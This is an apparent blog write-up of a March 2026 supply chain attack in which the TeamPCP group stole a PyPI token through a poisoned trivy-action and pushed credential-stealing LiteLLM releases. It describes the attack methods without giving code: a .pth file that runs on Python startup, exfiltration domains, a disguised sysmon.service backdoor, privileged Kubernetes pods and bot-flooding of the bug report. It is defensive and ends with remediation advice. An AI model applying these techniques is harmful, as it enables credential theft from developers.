The homepage of LiteLLM displays two security badges: SOC 2 Type I and ISO 27001, secured by Delve. The kind of trust signals that make enterprise procurement teams comfortable. The kind of certifications that are supposed to mean something.
On March 24th, 2026, they didn’t mean anything. A hacker group called TeamPCP uploaded a credential-stealing backdoor to LiteLLM’s PyPI package — a library with 97 million monthly downloads that routes AI API calls to over 100 providers, including Anthropic, OpenAI, and Google. Within three hours, roughly 500,000 machines were compromised and an estimated 300GB of data had been exfiltrated. SSH keys, cloud credentials, Kubernetes configs, crypto wallets, CI/CD secrets — everything a developer’s machine might hold.
The irony cuts deep: the attack vector was the vulnerability scanner sitting inside LiteLLM’s own CI/CD pipeline.
The Attack Chain: How a Security Tool Became the Weapon
To understand how this happened, you have to follow the chain back to March 19th — five days before the LiteLLM packages appeared on PyPI.
That day, TeamPCP compromised Aqua Security’s GitHub organization and quietly rewrote the tags on trivy-action, a widely-used GitHub Actions workflow component that runs Trivy vulnerability scans in CI/CD pipelines. The rewritten tags pointed to malicious code. It was a classic supply chain maneuver: don’t attack the target directly, attack the tool the target trusts.
LiteLLM’s CI/CD pipeline ran Trivy on every commit using the compromised action. For five days — March 19 through March 24 — that malicious Trivy code ran on LiteLLM’s GitHub Actions runners, silently scanning environment memory for secrets. Eventually, it found what it was looking for: the PYPI_PUBLISH token, the credential that authorizes package uploads to PyPI.
With that token in hand, the timeline accelerated:
- March 24, 10:39 UTC —
litellm-1.82.7uploaded to PyPI. The package included a credential stealer embedded inproxy_server.py. - March 24, 10:52 UTC —
litellm-1.82.8uploaded thirteen minutes later. This version added something more dangerous: alitellm_init.pthfile. - March 24, 16:00 UTC — Packages detected and pulled from PyPI. Three hours, seventeen minutes of exposure.
The .pth file was the escalation. Python automatically executes .pth files on interpreter startup — not just when you import litellm, but whenever any Python process starts. Even running pip itself would trigger the payload. You didn’t need to run your application. You just needed the package installed.
What It Stole
The payload operated in three stages. First, credential harvesting — sweeping the compromised machine for everything of value:
- SSH private keys (
~/.ssh/) - AWS, GCP, and Azure credentials and config files
- Kubernetes kubeconfig files
- Cryptocurrency wallet files
.envfiles (a goldmine of API keys and database passwords)- Docker configuration and credentials
- Shell history files
- SSL private keys
- CI/CD pipeline secrets
- Database connection strings
The collected data was then encrypted — AES-256-CBC combined with RSA-4096 — before exfiltration to models.litellm.cloud, a domain that mimicked LiteLLM’s legitimate infrastructure. Convincing, if anyone happened to be watching network traffic.
But the attack didn’t stop at data theft. For machines running Kubernetes, the payload attempted lateral movement: deploying a privileged pod to every node in the cluster. It also dropped a systemd service called sysmon.service — designed to poll checkmarx.zone/raw every five minutes for new commands. The name was chosen deliberately. sysmon sounds like a legitimate monitoring tool. Most administrators wouldn’t look twice at it.
How It Was Caught: A Fork Bomb Saved the Day
Here’s where the story gets strange. The attack was discovered not by a security team running threat detection tools, but by a developer named Callum McMahon at FutureSearch who was testing a Cursor MCP plugin.
LiteLLM pulled in as a transitive dependency. McMahon’s machine crashed — completely out of RAM.
The reason? The .pth file was broken. The attacker had written it to spawn a subprocess, but the subprocess itself triggered the .pth file again, which spawned another subprocess, which triggered it again. An accidental fork bomb. The attackers had coded the persistence mechanism so sloppily that instead of silently executing once and going quiet, it recursively spawned itself until the machine ran out of memory and crashed.
The crash drew attention. The .pth file was found. The supply chain attack unraveled.
Andrej Karpathy, the AI researcher and former Tesla AI director, put it memorably on social media: “vibe coding saved us — the attacker vibe coded the attack and it was too sloppy to work quietly.” It’s the rare case where poor attacker tradecraft saved potentially millions of compromised machines from a persistent backdoor that might have gone undetected for weeks.
TeamPCP’s Wider Campaign
The LiteLLM hit wasn’t a standalone operation. Throughout March 2026, TeamPCP executed a coordinated multi-ecosystem supply chain campaign touching five different platforms:
GitHub Actions: Beyond Trivy, the group compromised kics (another Aqua Security security scanning tool), poisoning GitHub Actions workflows across many projects that relied on either tool.
Docker Hub: Malicious image layers introduced into popular base images.
npm: Over 64 packages were compromised in what researchers are calling the “CanisterWorm” campaign. JavaScript and Node.js projects across multiple ecosystems were affected.
VS Code and OpenVSX: Malicious versions of Checkmarx security scanning extensions were published to both marketplaces. Security tooling, again, as the attack vector.
PyPI: LiteLLM was the flagship hit, but researchers believe other Python packages were targeted in the same window.
The group partnered with Lapsus$ — the notorious extortion collective — for monetization of the stolen data. That partnership adds context to the AstraZeneca breach claimed by Lapsus$ in the same week. Researchers believe the two incidents are connected, potentially through credentials stolen from developer machines that also had access to AstraZeneca’s infrastructure.
Issue Suppression: The Coordinated Silencing
When a GitHub issue (#24512) was filed reporting the suspicious packages, something unusual happened.
Within 102 seconds of the issue being opened, 88 bot comments flooded in from 73 unique accounts. The comments dismissed the report, claimed it was a false positive, and argued the packages were safe. Before a human maintainer could review the evidence, the issue was closed as “not planned” — using the compromised maintainer account that TeamPCP still controlled.
It’s a technique that’s appeared in other coordinated supply chain attacks: flood the bug report with noise to delay response time, then close it with the access you already have. In a three-hour window where every minute of silence means more machines installing the package, even a 30-minute delay in response is meaningful.
The issue suppression failed only because independent security researchers were already analyzing the packages and publishing findings externally, forcing the story into the open regardless of what happened to the GitHub issue.
The Attacker Quits
Then came the Telegram post.
On the group’s operational channel, TeamPCP’s leader — signing as -DMT — announced their departure:
“I am going to be handing the tdata for T000001B over to another member… My work here is largely done… Most nights for months I haven’t been sleeping and doing this in the midst of a burnout is perpetually making me very mentally unwell which I can’t afford right now. I’ve got what I came for now it’s time to exit.”
It’s a curiously human moment from a threat actor who just participated in one of the largest supply chain attacks of the year. Burnout. Sleep deprivation. Mental health. The language reads less like a criminal mastermind and more like a developer who took on too much and is walking away from the wreckage.
The operation continues. The -DMT persona is gone. Someone else holds the access now.
What LiteLLM Is Doing
LiteLLM’s response was swift once the packages were identified. The compromised versions were pulled from PyPI, all project credentials were rotated, and the team engaged Google Mandiant for incident response. New package releases were paused while the team audited the full scope of the CI/CD compromise.
The most significant structural change: LiteLLM is migrating to PyPI Trusted Publisher, a newer authentication mechanism that uses OIDC tokens tied to specific GitHub Actions workflows rather than long-lived API tokens. Under Trusted Publisher, there’s no static PYPI_PUBLISH token sitting in GitHub Actions secrets to steal. The workflow itself becomes the credential.
It’s the right fix, and it’s one that more projects should adopt. But it doesn’t address the upstream problem: the compromised trivy-action tags that let TeamPCP access the runners in the first place.
The SOC 2 Question
Those compliance badges are still worth discussing. LiteLLM earned SOC 2 Type I and ISO 27001 certifications. Those aren’t meaningless — they represent audits of security controls, documentation of processes, and demonstrated commitment to security practices.
They also did nothing to prevent this attack.
SOC 2 and ISO 27001 audit what your organization does internally: access controls, logging, incident response plans. They don’t audit whether the open-source actions you reference in your CI/CD pipeline were compromised overnight by a threat actor who gained access to the action maintainer’s GitHub org. The attack surface is simply outside the scope of what traditional compliance frameworks examine.
The supply chain risk model has been clear to practitioners for years: if you trust code you don’t control — GitHub Actions, npm packages, PyPI dependencies, Docker base images — you inherit the security posture of every maintainer upstream. That chain extends further than most compliance audits follow.
LiteLLM’s certifications weren’t fraudulent. They just weren’t designed to catch this.
Downstream Impact
The fallout extended well beyond LiteLLM itself. Because LiteLLM is a dependency for hundreds of AI engineering projects, the compromised versions were pulled into many environments before detection:
- DSPy — Stanford’s AI programming framework
- CrewAI — Multi-agent orchestration
- MLflow — ML lifecycle management
- LangChain integrations — Several LangChain components depend on LiteLLM
- OpenHands — Open-source AI software development agent
- Arize Phoenix — ML observability platform
Over 300 projects have since pinned their dependencies away from the 1.82.7 and 1.82.8 versions. If you use any of these tools and haven’t audited your environment, now is the time.
If you installed LiteLLM between March 24 and March 25 and your version resolves to 1.82.7 or 1.82.8, treat the machine as compromised. Rotate every credential it has ever touched. Check for sysmon.service in your systemd unit files. Check for unexpected processes. Audit your SSH keys.
Further Reading
The technical forensics on this attack are unusually detailed for such a recent incident. If you want to go deeper:
- LiteLLM Supply Chain Compromise — Credential Theft Overview — Comprehensive overview of the attack
- LiteLLM / Trivy Supply Chain Attack Forensics — Deep technical analysis of the Trivy → LiteLLM attack chain
- Callum McMahon’s Original Discovery Post — How the crash led to the discovery
- GitHub Issue #24512 — The original report and the bot-flood suppression attempt
- Snyk: Poisoned Security Scanner Backdooring LiteLLM — Snyk’s independent analysis
The supply chain is only as strong as its weakest upstream link. In this case, that link was a security scanner. The tool you trusted to find vulnerabilities became the vulnerability. The certification on your homepage became the irony.
TeamPCP’s leader is gone, burned out and sleeping at last. The stolen data is somewhere. Three hundred gigabytes of developer credentials, encryption keys, and cloud access. The new leadership has the keys now.
The operation continues.



